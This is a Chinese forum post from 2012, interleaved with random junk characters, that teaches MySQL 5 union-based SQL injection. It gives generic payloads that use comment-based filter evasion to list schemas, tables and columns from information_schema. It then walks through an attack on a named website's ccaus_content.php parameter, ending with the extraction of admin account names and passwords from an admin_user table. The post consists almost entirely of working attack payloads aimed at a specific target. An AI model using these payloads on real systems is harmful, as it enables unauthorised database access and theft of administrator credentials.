查库) y+ Z7 B/ i w4 _2 q9 `
6 H, | n6 m+ yid=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
+ R! T! F6 R1 U1 {
/ P' H* H Y3 t6 G, x查表/ P; n7 F# C5 r2 i: }+ E
y! N, W3 `0 Y4 q
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
3 }5 u9 q- v7 e2 p* l: t" D
) }: q$ G7 T( W8 k, T0 l. r查段
* {; p7 T4 r2 d$ O. U2 c! A4 q7 {- ~' [! V7 D: k
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1. t: ~7 K+ B* b8 k: F
8 k" w8 Q5 B. c- l7 d0 y) }
/ a) c0 v! @; f8 w" Hmysql5高级注入方法暴表
/ }# C7 Z5 q6 ^ c `
- a: j c- J/ m c7 M1 t3 r* D例子如下:5 F+ o+ D. [, ?
9 v# H( B: D& J/ W9 O Y2 S. U
1.爆表' ]* `9 y. D$ E- d1 L: q L) _
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
1 I4 Q$ ]4 p0 @6 E2 `8 I这样爆到第4个时出现了admin_user表。; v! M( n1 v6 t, z( a; E( \
- ^7 ~7 E! L( `, Z
2.暴字段6 K/ o2 Q3 G4 x! M: y
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
$ ]! M" B& L: K" U
1 F1 e* M x0 x9 B
8 l! U5 ^/ S& v. s$ ]3.爆密码
3 } y0 ~% w; d# N v7 d8 T1 Ohttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ; y2 w2 K. q% l' O, w9 b, j
9 ^3 W7 J7 Z N
. |6 h* Y* e( l" g8 O
|
发表于 2012-9-13 16:29:37
收藏
支持
反对